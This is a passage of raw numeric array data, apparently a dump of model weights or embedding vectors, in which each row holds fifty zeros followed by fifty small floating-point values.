-3.541, -1.06, 0.3032, 0.203, -0.79, -0.0379, 0.3887, 0.334, -0.5586, 0.9233, 0.003735, -0.02701], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6094, -0.02678, -0.58, 0.709, 1.541, 1.278, 1.193, -0.08527, -0.214, 0.136, 0.01802, -0.9297, 0.2454, 0.351, -0.528, 0.3125, -0.695, -0.8887, 0.9897, 0.0686, 0.5117, 0.7773, 0.4836, 0.5938, -0.01764, -0.00808, 0.4788, -0.2727, 0.9316, -1.088, -0.2289, 0.179, -0.209, -0.09705, -0.2222, -0.35, 0.3354, -0.03595, -1.125, 0.0349, -0.04663, 0.5107, 0.0574, -0.0494, 0.4622, -0.568, 0.1456, -0.4482, -0.3901, -0.435], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0282, 0.0005665, -0.0332, 0.02216, -0.00849, -0.01807, -0.05658, -0.011955, 0.03278, 0.01187, -0.03857, -0.0315, -0.01868, -0.02452, -0.03091, -0.01176, -0.007603, 0.005684, -0.04776, -0.01852, -0.01683, -0.03253, -0.04123, 0.03574, 0.002924, -0.0178, 0.04385, 0.01848, -0.02194, -0.0255, -0.0324, -0.04935, 0.0099, -0.0401, -0.03247, -0.02129, -0.01941, -0.04, 0.00536, -0.02638, -0.00801, -0.02107, 0.00992, 0.04465, 0.03458, -0.011795, 0.03094, -0.0197, -0.02869, 0.02844], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4983, -0.002127, -0.3005, -1.309, -1.942, 0.2544, -0.145, -0.7695, -0.02939, 0.2058, -0.01935, 0.912, 0.396, -0.1094, -0.1659, 0.2197, -0.999, 1.002, 0.1532, 0.71, -0.356, 0.473, -0.1504, 0.907, -0.01087, -0.01564, -0.644, 0.0745, 1.924, 0.498, -0.02608, -0.833, 0.1395, -0.9297, -0.71, -0.9004, 0.3208, -0.001629, -0.10986, 0.4656, -0.423, 0.5312, 0.3835, 0.07336, 0.328, -0.499, 0.2393, -0.8813, 0.1594, -0.3604], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2654, -0.03072, 0.04626, -0.1818, 0.733, -0.1938, 0.282, -0.6997, 0.186, -0.0937, 0.02382, -0.09344, 0.265, -0.1776, 0.04202, 0.374, -0.173, 0.09283, 0.4395, -0.04654, -0.88, -0.4768, -0.07764, 0.1667, -0.0312, -0.0424, -0.414, -0.0679, 0.1307, -0.7485, 0.2878, -1.12, 0.3315, -0.2693, -0.007122, 0.2625, -0.2085, 0.04272, -0.9316, 0.5796, -0.3015, -0.1572, 0.3655, -0.02365, 0.1337, 0.4016, -0.07587, -0.0967, 0.155, -0.2646], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.521, 0.0291, -2.018, -3.736, -4.047, -0.5625, -0.2, 1.403, -0.2512, 0.656, -0.004314, -0.7046, 0.846, -0.7935, 1.197, -1.7, 0.627, -0.7173, 0.141, 0.5586, 0.2988, -0.7905, -0.593, -1.091, 0.03778, 0.02849, -0.1432, 0.4824, 0.5854, 1.093, -0.4697, -5.973, -0.1721, -0.5776, 0.612, 1.225, 0.03918, -0.02153, -0.3364, -1.701, 1.576, 1.697, -1.111, -0.0397, 0.557, -0.536, 0.02213, 1.633, -0.6562, 1.04], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03955, -0.03262, -0.00406, -1.026, -0.1078, 0.1387, -0.00947, -2.805, -0.204, -0.776, 0.009476, -0.328, 0.6787, 0.576, -0.5586, -0.426, -1.62, 0.791, -0.1343, -0.916, 0.8013, -0.8604, 0.0842, -0.3242, 0.03488, -0.002249, -0.624, -0.9087, -0.3635, -0.3691, 0.6743, -2.988, -0.2145, 0.1516, -0.5376, -0.8994, 0.503, -0.0348, 0.4426, -1.175, 1.044, 0.02121, 0.7744, 0.02759, 0.6304, -0.435, 0.273, 1.037, -0.6772, -0.5703], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7505, -0.02188, 0.0847, -0.704, -0.004856, 0.3054, -0.05856, -0.4907, 0.4746, 0.09644, 0.011505, 0.2412, -0.3826, 0.2231, -0.2312, 0.687, 0.3293, -0.03912, -0.3474, 0.341, -0.268, -0.534, 0.174, -0.3225, -0.04858, 0.02718, -0.5117, -0.1521, 0.0744, -0.07275, -0.04813, -0.97, 0.0936, -0.0681, -0.2769, 0.0882, -0.1908, -0.005943, 0.6787, 1.277, -0.2067, 0.2413, -0.002035, 0.01537, 0.319, -0.3882, -0.2458, 0.1569, 0.1407, -0.4092], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.797, -0.01949, 0.3162, 0.2854, -0.1174, -0.06323, -0.2325, -0.4756, -0.1709, -0.3108, -0.0233, 0.1606, 0.06274, 0.2145, 0.418, 0.2323, 0.1975, 0.6455, 0.05466, 0.2297, -0.3052, -0.00451, 0.007298, 0.7285, -0.014084, 0.03111, -0.521, 0.3784, 0.3691, 0.0929, 0.2216, 0.572, 0.3027, 0.1768, 0.4546, -0.5254, 0.0874, 0.02293, 1.727, -0.2588, -0.6494, -0.4749, 0.2069, 0.04776, 0.3706, 0.0449, 0.1151, 1.011, 0.1676, 0.2678], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7524, -0.03763, 0.669, 0.653, 0.593, -0.561, 0.1302, 0.08514, 0.1631, -0.2242, -0.0183, 0.132, 0.2812, 0.154, 0.6606, 0.6465, 0.4214, -0.283, -0.1247, 0.1914, -0.6436, -0.7417, -0.11444, 0.1259, 0.02625, -0.03122, -0.5376, 0.1439, -0.257, 0.658, 0.566, 0.667, -0.03885, 0.1616, -0.452, -0.0419, -0.2234, -0.04456, 0.4285, 0.448, -0.10266, -1.022, -0.2488, 0.03796, 0.2476, -0.0889, -0.4744, -0.1445, 0.4956, -0.0968], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09515, -0.001873, -0.765, 0.178, -0.00285, -0.2583, 0.4202, 0.531, -0.29, -0.3047, -0.03217, -0.2695, 0.2455, 0.1412, -1.341, -0.648, -1.148, -0.2212, -0.4226, -0.05817, -0.09344, 0.5293, -0.0786, 0.368, -0.02373, -0.0345, 0.3813, -0.10974, 0.752, -1.33, -0.05765, -1.104, 0.1296, 0.08765, 0.2705, -0.6025, 0.3608, -0.02028, -0.001578, -0.7773, -0.10736, 0.375, -0.669, -0.04123, -0.0495, 0.02444, 0.1724, 0.7856, -0.1411, -0.352], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.254, 0.02422, -0.201, 0.12054, -0.618, -0.5977, 0.545, 0.2644, -0.1584, 0.2203, 0.01072, -0.874, -0.12317, -0.882, 0.179, -0.2803, -0.286, -0.2966, -1.25, -0.2169, -0.081, -0.3452, 0.03403, -0.3179, 0.02866, 0.0476, -0.2517, 0.3813, -0.3174, 0.2261, -0.1371, 0.0653, -0.0647, 0.442, -0.8384, 0.0562, 0.3525, -0.007298, 6.066, 0.0546, 0.02403, -0.175, -0.5527, -0.0186, 0.1888, 0.1512, 0.387, 0.1084, -0.1454, 1.021], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4644, -0.02095, -0.1615, 0.764, -0.4849, -0.3318, 0.1366, -0.602, 0.3318, 0.5728, -0.0233, 0.5723, 0.988, 1.07, 0.1798, -0.472, -0.6694, 0.2267, -0.005028, -0.4058, 0.777, 0.3765, 0.3435, 0.2087, 0.0234, 0.0006733, 0.605, 0.0779, -0.2847, 0.2822, -0.3242, 0.3062, -0.3198, -0.3545, -0.9053, 0.1458, 0.329, 0.01855, 1.044, -0.2908, -0.0862, -0.10144, 0.477, -0.02928, -0.3193, 0.5376, -0.05093, -0.4492, -0.4297, -0.471], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1076, -0.01496, -0.03592, -0.3726, 0.703, 0.7627, 0.358, 0.05032, -0.3823, -0.2603, -0.02632, 0.2812, 0.12177, 0.09357, -0.1971, 0.1252, 0.4004, -0.395, 0.566, 0.03607, -0.178, 0.138, -0.1934, 0.06024, 0.00832, 0.03198, -0.01704, -0.277, 0.4097, -0.06274, 0.02611, -0.08685, -0.10425, 0.11334, 0.1185, -0.4158, -0.1287, -0.00506, 4.17, -0.3252, -0.1927, 0.02325, -0.8735, 0.012596, 0.203, 0.09393, -0.234, -0.1027, 0.1587, 0.5376], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.78, 0.004604, -0.1078, 0.4133, 0.09503, -0.567, -0.00879, -0.04984, -0.1504, -0.3203, -0.03915, -0.2712, -0.3213, 0.3528, 0.2563, -0.01619, -0.361, 0.338, -0.265, -0.2998, -0.0254, -0.2544, 0.1553, -0.0992, -0.01369, -0.000656, 0.07623, -0.0703, -0.2854, -0.07733, 0.287, 0.2241, -0.1367, 0.08875, -0.4753, -0.3982, 0.1082, -0.0094, 0.636, -0.4675, 0.02032, -0.1013, 0.497, 0.0003057, 0.2532, 0.3525, 0.1912, -0.02339, -0.0936, 0.003767], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.907, -0.02007, -0.05423, 0.2566, -0.2737, -0.0816, -0.082, -0.6675, 0.0648, -0.371, -0.02077, 0.545, -0.04028, 0.0819, 0.2443, 0.9263, 0.000681, -0.05768, 0.011856, -0.03635, 0.2673, 0.438, -0.3647, -0.808, 0.00594, -0.02885, 0.4502, 0.452, 0.604, -0.3232, 0.09283, -0.7427, -0.246, -0.2983, 0.229, -0.0734, 0.1049, -0.02415, 0.7783, 0.569, 0.08234, 0.262, 0.0433, 0.05432, 0.03592, 0.2493, -0.658, -1.193, 0.0658, -0.1735], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05536, 0.009766, -0.9717, -0.3584, -1.043, 0.61, -0.2568, 0.0651, -0.6626, -0.1469, 0.02583, -0.3347, -2.209, -0.2593, 0.9316, 0.4534, -0.704, 0.786, -0.5356, -0.2156, 0.8477, 0.4456, 0.455, 0.4355, -0.0181, -0.02269, -0.4414, 0.2094, -0.1838, -0.3325, 1.498, -0.4236, -14.695, -0.3442, 0.5024, 1.067, 1.107, -0.02815, 0.1921, 1.0, -0.2554, 0.7593, 0.923, -0.0367, 1.122, -1.312, -0.4714, -4.652, 0.02724, -0.6855], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.234, 0.02931, 0.3328, 1.247, -0.7734, 0.1166, -0.5728, 0.2593, -0.3376, 0.1594, 0.002361, 0.05417, -0.94, 0.0436, 0.4548, 0.336, 1.421, -0.3606, 0.1462, -0.05222, -0.09314, 0.5947, 0.2747, 0.0928, 0.01611, 0.03326, -0.4028, 0.0339, 0.1879, -0.4045, 0.01599, 0.542, 0.4922, 0.4048, -0.5693, -0.4421, 0.1781, -0.01113, -0.224, -0.10803, 0.3677, -1.316, 0.406, 0.01561, 0.227, -0.52, -0.5137, 0.4622, 0.0778, 0.07733], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.863, -0.04675, 0.2069, 0.4343, 0.576, 1.143, 0.05664, -0.6367, 0.0502, -0.3284, 0.0069, -0.3403, 0.2065, -0.1124, 0.4314, -0.0805, 0.0644, 0.8037, -0.1458, -0.5864, -0.006123, 0.876, 0.3552, -0.04337, -0.0426, -0.02982, 0.8047, -0.4297, 0.1448, -0.551, -0.2467, -0.3445, 0.01423, 0.093, -0.248, 0.02888, 0.7056, -0.004284, 1.879, -0.1309, -0.03424, 0.0676, 0.3352, 0.0653, 0.2238, 0.237, -0.1324, 0.1472, 0.06665, -0.0769], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1365, -0.03017, 0.2115, 0.4006, -0.1635, -0.10297, -0.01721, -0.1438, -0.1547, -0.2057, 0.005627, -0.11005, -0.6704, -0.27, 0.2208, 0.087, -0.3896, -0.1348, 0.0678, -0.4387, 0.4167, -0.1938, 0.0465, 0.4163, -0.0324, 0.0418, 0.7256, 0.06165, -0.289, -0.1333, 0.002321, 1.002, -0.1748, 0.3337, -0.619, -0.2568, 0.179, -0.00362, 3.486, 0.172, 0.004395, -0.2178, 0.0994, 0.02422, 0.1727, 0.5645, 0.5913, -0.8213, -0.22, 0.1439], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3672, -0.01478, 0.2482, -1.608, 0.381, 1.103, -0.3123, 0.5093, 0.2148, -1.415, -0.0317, -1.081, 0.6577, 0.2435, 0.02805, 0.07855, 1.254, -0.2059, 0.00934, 0.1348, -0.6997, -0.3293, -0.611, -0.3752, 0.02428, 0.03223, 1.148, -0.4395, -0.2664, 0.4111, 0.1225, 1.741, -0.3843, 0.05585, 0.827, -0.2788, 0.4268, 0.01666, 1.575, 0.4385, -0.04202, 1.0625, 0.5654, 0.01569, -0.725, 0.468, 0.4556, 0.7183, -0.005306, -0.0925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2578, -0.03314, 0.2761, 1.378, -0.825, -0.5986, 0.6685, -0.2056, 0.058, 0.306, -0.01502, 0.2328, 0.9033, 0.831, 1.004, 0.7856, 0.1891, 0.3154, 1.525, 0.8525, 0.7407, 1.609, 0.524, -0.0523, 0.0053, -0.01984, -0.9224, -0.532, 0.3828, 0.08875, 0.3284, 0.926, 0.345, -0.06305, 0.2578, -0.363, 0.75, -0.04068, 0.1355, -0.1407, 0.9795, -0.0624, 0.0922, -0.01337, -0.1282, -0.1804, 0.129, 2.605, -0.2993, -0.801], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.578, 0.02156, 0.1489, -0.1703, -0.3862, 0.03424, -0.2085, -1.468, 0.3984, 0.1656, -0.03082, 0.1843, 0.0772, 0.1582, -0.3962, 1.247, -0.06696, 0.1626, 0.321, -0.1277, 0.316, 0.399, 0.3577, -0.564, 0.04034, 0.02518, 0.05777, 0.112, 0.1714, -0.08057, 0.2625, -1.811, -0.111, -0.341, -0.4795, 0.1216, 0.0885, -0.02336, 0.2812, 1.532, 0.2343, -0.28, 0.1613, 0.0354, 0.5737, -0.4211, -0.326, 0.257, -0.08527, -0.2104], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3528, 0.03735, 0.45, 0.2756, -0.0898, -0.1868, -0.1191, -0.899, -0.2421, -0.2296, 0.0433, -0.261, 0.6104, 1.382, 0.2178, -0.282, 0.5493, 0.6113, 0.1106, 0.1675, 1.257, 0.3848, -0.663, 0.9644, 0.04218, 0.03714, -1.088, -0.4353, 0.969, -0.1525, -0.3447, 1.067, 0.422, 0.621, -0.3076, 0.7812, -0.5103, 0.03784, 0.1197, -0.1606, 0.3206, -0.111, 0.165, -0.04138, -0.4893, -0.00256, -0.1261, -0.32, -0.272, -0.3394], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.752, 0.008026, 0.1272, 0.7646, -0.65, 0.4277, -0.282, 0.2427, 0.05096, -0.374, 0.003086, 0.3271, 0.507, -0.124, -0.7812, 0.6045, -0.1483, -0.4233, 0.2188, -0.2095, 0.2195, 0.437, 0.3901, 0.3647, 0.03784, 0.04068, 0.3254, 0.1973, 0.1229, 0.2289, 0.3862, 0.346, -0.4607, 0.2095, -0.4546, -0.7676, -0.433, 0.02858, -1.87, -0.07434, -0.641, -0.2441, 0.55, 0.0388, 0.04782, 0.7773, -0.511, -0.164, 0.2319, 0.07733], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.406, -0.01718, -0.3486, -2.748, -1.249, 0.9146, -0.134, -0.0337, -0.02682, 0.5625, 0.006195, -0.2445, -0.7847, 0.1476, -0.0553, -0.5576, -1.171, -0.3086, -0.316, 0.1545, 0.2288, 0.612, -0.05365, 0.01515, -0.02058, 0.01414, 0.2236, -0.6216, 0.613, 0.01157, -0.2046, -4.617, 0.389, 0.2054, -0.3357, -0.1467, -0.3562, -0.01645, 0.4558, -0.03455, 0.292, 1.443, 0.4365, 0.05374, 0.4458, -1.629, -0.3113, -0.107, 0.2117, 0.3308], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.148, -0.0281, -0.3164, -1.13, 0.8267, 0.382, 0.688, -0.1631, -0.0558, 0.1385, -0.03656, 0.0974, -1.445, 0.2249, -0.1, 0.1467, -0.2498, 1.767, -0.578, -0.0817, -1.268, -0.623, -0.03357, -0.04083, -0.006886, -0.03757, 0.8115, 0.0922, 0.1996, 0.02147, -0.596, -4.926, 0.1092, -0.4119, 0.5127, 0.4446, 0.2888, -0.0439, 0.9634, -0.1113, -0.041, -0.04282, 0.449, 0.02141, 0.1342, -0.04214, 0.7397, -0.626, -0.1892, 0.01099], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.47, -0.04138, 0.275, -0.006195, 2.38, 0.7153, -0.2725, -0.00431, 1.26, 0.03378, -0.01804, -0.6953, -1.252, 0.5005, 0.3877, 0.3323, -0.6167, 0.3975, 0.4712, -0.2174, 0.8027, -0.7197, 1.034, -0.1868, -0.04306, -0.02083, -0.609, 0.5376, 1.041, 0.1616, 0.97, -0.257, -0.5854, -0.3503, -0.8286, -0.1381, 0.1372, 0.007664, 0.3083, 0.001277, 0.2113, -0.3127, -0.0787, 0.06213, 0.2363, -0.3105, -0.772, 0.4893, -0.0775, 0.2169], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2773, 0.010895, -0.05765, -0.4265, -1.026, -0.4482, -0.1816, -0.1245, 0.011925, 0.1469, 0.02, 0.1072, 0.4802, -0.1223, -0.3525, 0.4263, -0.324, 0.0817, 0.08167, -0.02876, 0.3823, 0.911, 0.1054, 0.827, -0.02393, -0.03806, 0.2224, -0.4746, 0.012436, 0.10876, 